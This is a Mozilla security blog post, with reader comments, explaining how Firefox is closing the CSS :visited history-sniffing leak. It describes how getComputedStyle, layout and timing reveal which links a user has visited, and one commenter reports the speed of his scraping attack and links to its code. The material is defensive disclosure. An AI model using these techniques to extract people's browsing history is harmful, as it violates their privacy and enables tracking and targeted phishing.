Plugging the CSS History Leak

Privacy isn’t always easy.

We’re close to landing some changes in the Firefox development tree that will fix a privacy leak that browsers have been struggling with for some time. We’re really excited about this fix, we hope other browsers will follow suit. It’s a tough problem to fix, though, so I’d like to describe how we ended up with this approach.

History Sniffing

Visited and Unvisited LinksLinks can look different on web sites based on whether or not you’ve visited the page they reference. You’ve probably seen this before: in some cases, visited links are purple instead of blue. This is just one of the many features web designers use to make the web the best it can be, and for the most part that’s a good thing.

The problem is that appearance can be detected by the page showing you links, cluing the page into which of the presented pages you’ve been to. The result: not only can you see where you’ve been, but so can the web site!

Originally specified as a useful feature for the Web, visited link styling has been part of the web for… well, forever. So this is a pretty old problem, and resurfaces every once in a while to generate more paranoid netizens.

The most obvious fix is to disable different styles for visited versus unvisted links, but this would be employed at the expense of utility: while sites can no longer figure out which links you’ve clicked, neither can you. David Baron has implemented a way to help keep users’ data private while minimizing the effect on the web, and we are deploying it to protect our users. We think this represents the best solution to the problem, and we’ll be delighted if other browsers approach this the same way.

Technical Details.

The biggest threats here are the high-bandwidth techniques, or those that extract lots of information from users’ browsers quickly. These are particularly worrisome since they enable not only very focused attacks, but also the widespread brute-force attacks that are, in general, more useful to a variety of attackers (potentially including fingerprinting).

The JavaScript function getComputedStyle() and its related functions are fast and can be used to guess visitedness at hundreds of thousands of links per minute. To make it harder for web sites to figure out where you’ve been without radically changing the web, we’re approaching the way we style links in three fairly subtle ways:

Change 1: Layout-Based Attacks
First of all, we’re limiting what types of styling can be done to visited links to differentiate them from unvisited links. Visited links can only be different in color: foreground, background, outline, border, SVG stroke and fill colors. All other style changes either leak the visitedness of the link by loading a resource or changing position or size of the styled content in the document, which can be detected and used to identify visited links.

While we are changing what is allowed in CSS, the CSS 2.1 specification takes into consideration how visited links can be abused:

“UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user’s privacy while rendering visited and unvisited links differently.” [CSS 2 Specification]

Change 2: Some Timing Attacks
Next, we are changing some of the guts of our layout engine to provide a fairly uniform flow of execution to minimize differences in layout time for visited and unvisited links. The changes cause all styles to be resolved on all links for both visited and unvisited states, and it is stored; then, when the link is styled, the appropriate set of styles is chosen making the code paths for visited and unvisited links essentially the same length. This should eliminate some of the easy-to-mount timing attacks.

Change 3: Computed Style Attacks
JavaScript is not going to have access to the same style data it used to. When a web page tries to get the computed style of a link (or any of its sub-elements), Firefox will give it unvisited style values.

What does this mean for users?

For the most part, users shouldn’t notice a change in how the web works. A few web sites may look a little different, but visited links will still show up differently colored. A few sites that use more than color to differentiate visited links may look slightly broken at first while they adjust to these changes, but we think it’s the right trade-off to be sure we protect our users’ privacy. This is a troubling and well-understood attack; as much as we hate to break any portion of the web, we need to shut the attack down to the extent we can.

We have to be realistic, though: there are many ways all browsers leak information about you, and fixing CSS history sniffing will not block all of these leaks. But we believe it’s important to stop the scariest, most effective history attacks any way we can since it will be a big win for users’ privacy.

If the remaining attacks worry you, or you can’t wait for us to ship this fix, version 3.5 and newer versions of Firefox already allow you to disable all visited styling (immediately stops this attack) by setting the layout.css.visited_links_enabled option in about:config to false. While this will plug the history leak, you’ll no longer see any visited styling anywhere.

Enhancing Privacy on the Web.

We want to bridge the gap between our users’ expectations of privacy and what actually happens on the web. Sometimes users have an expectation that we preserve their privacy a certain way, and if we can, we want to live up to it. Privacy isn’t a feature that can simply be added to a browser, though; it often comes at the expense of utility. We think we’ve found a fix that will balance flexibility for web developers while providing a safer experience for our users on the web.

Sid Stamm, Mozilla Security

67 responses

  1. Dood wrote on :

    This sounds to me like a hard-to-implement, hard-to-maintain and quite unreliable solutions, I am quite confident though it won’t break anything important…
    Still, can somebody please summarise for me the arguments against the SafeHistory approach?
    (I guess you discussed this not only in the Bugzilla entry but also on IRC and etc.)

  2. mogya wrote on :

    Why don’t you handle such site as “bad site” on the Malware Protection?
    The sites using “the CSS History Leak” are malicious site, aren’t they?

  3. Kulmegil wrote on :

    Soo… will the new hack block completely the possibility to determine visited links? – not only by getting node and it’s children “computedstyle” but also by getting it indirectly from PARENT node (by checking it’s computed height for example)?

  4. Sai Emrys wrote on :

    Could you please fix the link for my results page from my blog repost to http://cssfingerprint.com/results (the original page)?

    Thanks.

    1. Sid Stamm wrote on :

      @Sai Emrys: Of course! Thanks for the link.

  5. Sai Emrys wrote on :

    @Adam My attack (which Sid kindly linked to) is AFAIK the fastest one currently out there. My current throughput using reliable methods is (local to the browser):
    Chrome: .04 ms/URL, 1,500,000 URL/min
    Explorer: .26 ms/URL, 227,000 URL/min
    Firefox: .10 ms/URL, 553,000 URL/min
    Opera: .09 ms/URL, 640,000 URL/min
    Safari: .02 ms/URL, 3,690,000 URL/min

    IOW, it’s quite a lot faster than the fastest you thought.

    There are some other issues that are preventing me from actually doing that much throughput end-to-end; a typical scraping tests ~80-100kURLs 4x each (on my dev box I’ve gotten up to ~250*4k). But that’s just a temporary hurdle. The severity of this hole is quite significant.

    My code is entirely open source, so if you want to know how the scraping part works, just look at http://github.com/saizai/cssfingerprint/blob/master/public/javascripts/history_scrape.js

    Feel free to visit http://cssfingerprint.com if you’d like to see the effects.

    FWIW, I think that DBaron’s approach is fairly solid. I don’t think that there is anything that can be done short of what he’s doing in terms of breaking expectations of usage, while still fixing the bug. As the post says, it’s an unavoidable trade-off.

    Of course, I’ll also be one of the first to try to break his code, just in case I’m wrong about that. 😉

  6. Otávio wrote on :

    I agree with “36 – Eris”, and thinks even better, why you just hidde the src attr in the A tag, if it’s from other domain, show an about:blank or anything like that.

  7. Dhouwn wrote on :

    BTW: What about subpixel positioning, is there a chance that a different link colour might interact with this?

  8. Ferenc Veres wrote on :

    What about background-position?

    Can’t we keep that, so using “CSS Sprites” for checkmarks and other visual – also color blind friendly – styles would be possible? One could use that to stroke visited PDF links I think, as requested in a comment above. Does it change anything detectable?

    Now that we know, COLOR will stay, could you set a better visible link color for this blog and another (different) color for visited links? Thanks.

  9. Edward Jones wrote on :

    I don’t understand how Michael (comment 23) can say that minus the coloring of links a browser becomes completely useless. While I do sympathize with his condition which I’m sure presents many challenges in life, a web page does not suddenly stop working if you can’t differentiate between visited and non-visited links. I am confident that he would still be able to use any browser even if no difference in the styling of visited vs. non-visited links was presented. I am the first person to stand up for accessibility and design my websites to be usable by those with screen readers for example. I think the absolutism of his comment does a disservice to the accessibility movement.

  10. Adam Messinger wrote on :

    For all of those asking about allowing broader :visited link styles for links within the same domain — this will still have privacy implications on sites like LiveJournal and WordPress.com. Many users share the same domain on those sites, and it would be possible for one LJ user (for example) to determine all the other LJs a visitor had viewed.

    Though I understand the need to fix this privacy problem, I’m among those who are less than thrilled at the constraints being imposed on front-end designers and developers. Hopefully a less limiting solution will be found at some point in the future.

  11. Chris wrote on :

    Why is this even a privacy issue? It’s not like someone is going to have some gossip site that tells the sites that certain ip addresses visit.

    The only people I can think of that would maybe have a rational reason to be concerned about the web surfing privacy of their ip address is people who are doing something illegal online such as going to websites to get child pornography or something. But why would we want to protect them anyways?

    This is just as stupid as people thinking their privacy is being violated when their DNA is on file after an arrest when they’re found not guilty.

    In both cases there would be no harm done for people that deserve no harm.

  12. Justen wrote on :

    I have mixed feelings about this. Privacy is a personal responsibility; giving people the tools to enhance their privacy is one thing, but using hamhanded techniques like this is unlikely to help very much and may cause headaches for designers and developers who legitimately use the features you’re about to axe. If you really want people to have better privacy, just give them better user interface tools to protect it. You could do things like provide a button in the main UI to block the presently visited site from appearing in history, another to block the present site from accessing history information, and another to clear all history. Give them more granular control of what kinds of things get saved to history and for how long via an intuitive control panel.

  13. Daniel Veditz wrote on :

    @Chris

    The main demo sites know nothing about “you”, so maybe the fact that they know where “you” visit is merely interesting. But sites that already know more specific things about you (because you have an account with them, for instance) can now correlate all sorts of things with a more specific notion of “you”.

    This does far more than catch people doing illegal things, criminals are not the only ones with “something to hide”. Examples:

    A hacker can use this to figure out which online bank you actually use and present a more believable phishing attack.

    Online stores could show you higher prices if they notice you visit high-end online stores and cheaper prices if you visit walmart.com (Amazon, among others, has at least experimented with showing different prices to different users, though their technique is unknown and probably isn’t using CSS history).

    A military site (where you’re required to authenticate) might find out you’re gay and ruin your career even though you’ve been careful not to “tell”.

    A blog might show only the sharing icons (digg, reddit, facebook, etc) for the services you use rather than a dozen or two confusing little icons (this one might actually be positive).

    Web ads could be better targeted at your demographic (possibly good or creepy)

    criminal groups with websites/discussion groups could use this to “out” undercover cops or informants.

  14. Chris wrote on :

    @ Daniel Veditz

    Good points. I feel stupid not thinking about sites that you signed up for.

    The hacker scenario would be a security problem, caused by a privacy issue. A good point.

    The online stores showing higher prices to certain people and the undercover cop issues are also very good points.

    I can think of other negative situations that could arise from this privacy issue now as well.

    I should have thought on it longer. Thanks for setting me straight 🙂

  15. Bruce wrote on :

    Like everyone else, I really hope that Mozilla developers and other browser developers will only limit styling on visited external links.

  16. Mitchell Evan wrote on :

    Ditto @Matthew. Make the security improvement the default, but allow users to override it by browser configuration. This will go a long way to addressing the accessibility issue.

    Ditto the many requests to make the changes apply only to links to external sites. But we probably want to define external as “untrusted” instead of “other domain”, in order to support a browser’s list of trusted sites e.g. corporate configuration of trusted intranet sites.

  17. bpjonsson wrote on :

    I just want to point out that if color is the only means available to differentiate visited links from unvisited ones then the best still possible way to be nice to people with color vision problems is the one which always was most effective:

    Use high text/background contrast an let :visited be inverse video relative :link.

    This is not much used even now in spite of being most effective; no doubt because inverse video is dead ugly and jumps out of the page/screen, and probably not only because we’re unused to it.

    Since I’ve got (non color) vision problems myself I’ve thought a lot about the issue of differentiating (un)visited links from each other clearly without depending on color, and without having to sacrifice the traditional uses of font properties for emphasis. Whatever preferences I had are out now!

    If color is the only remaining way of differentiating links from non-links at all we’re really in trouble…

  18. izdelava strani wrote on :

    I really hope that you’ll do the job and even most that the rest will follow. Cos as a website developer i’m feed up with all the browsers that need to be satisfied so that the web site looks good in all of them.

  19. Pat wrote on :

    Pat from AddToAny. We’ve deployed this technique on our sharing widget for years (search for “addtoany smart menu”) so this does indeed affect us and over 100,000 publishers. Personally, I’m okay with plugging this hole to a certain degree, but the aforementioned seems like a silver-bullet approach with too many developer implications.

    AddToAny’s script, for instance, queries against URLs from 200 sharing/bookmarking services to place visited services at the top of the sharing menu. It’s a marvelous use-case, I might add. 😉 200 queries is not “high-bandwidth” as defined above, but it’s noteworthy. Just FYI the results are used on runtime, client-side only.

    My thoughts:

    Have we discussed defining a ceiling for high-bandwidth queries? A maximum number of queries doesn’t cover all privacy implications of this hack, but it would plug the more infamous and nefarious attacks. AddToAny would certainly favor this approach.

    Adopting a same-origin policy on this issue definitely makes sense to me. @Adam Messinger re: your wordpress.com example: That’s why wordpress.com does not (and probably never will) allow arbitrary JavaScript from publishers. Not sure about LiveJournal, but most sites of this nature don’t permit arbitrary JavaScript due to a slew of issues extending beyond this one.

    Regardless of outcome, this surely is an exciting development and we’ll be monitoring the conversation here and at bugzilla. Please ping me if I miss anything or if you’d like to chat directly. Twitter @micropat or pat at addtoany. Cheers!

  20. Bruce wrote on :

    Can’t Mozilla simply disable the ability of javascript to determine all the styles on visited links instead of disallowing those styles?

    1. Sid Stamm wrote on :

      @Bruce: if we just disabled access via JS, that wouldn’t solve any of the timing attacks or the non-JS CSS-based attacks (those that rearrange the DOM, resize things, or create requests for images). For example, take a look at http://browser-recon.info. The fact that there are so many ways to access the history, with and without JS, makes it necessary to address the capabilities and not just the information presented to JS.

More comments: 1 2 3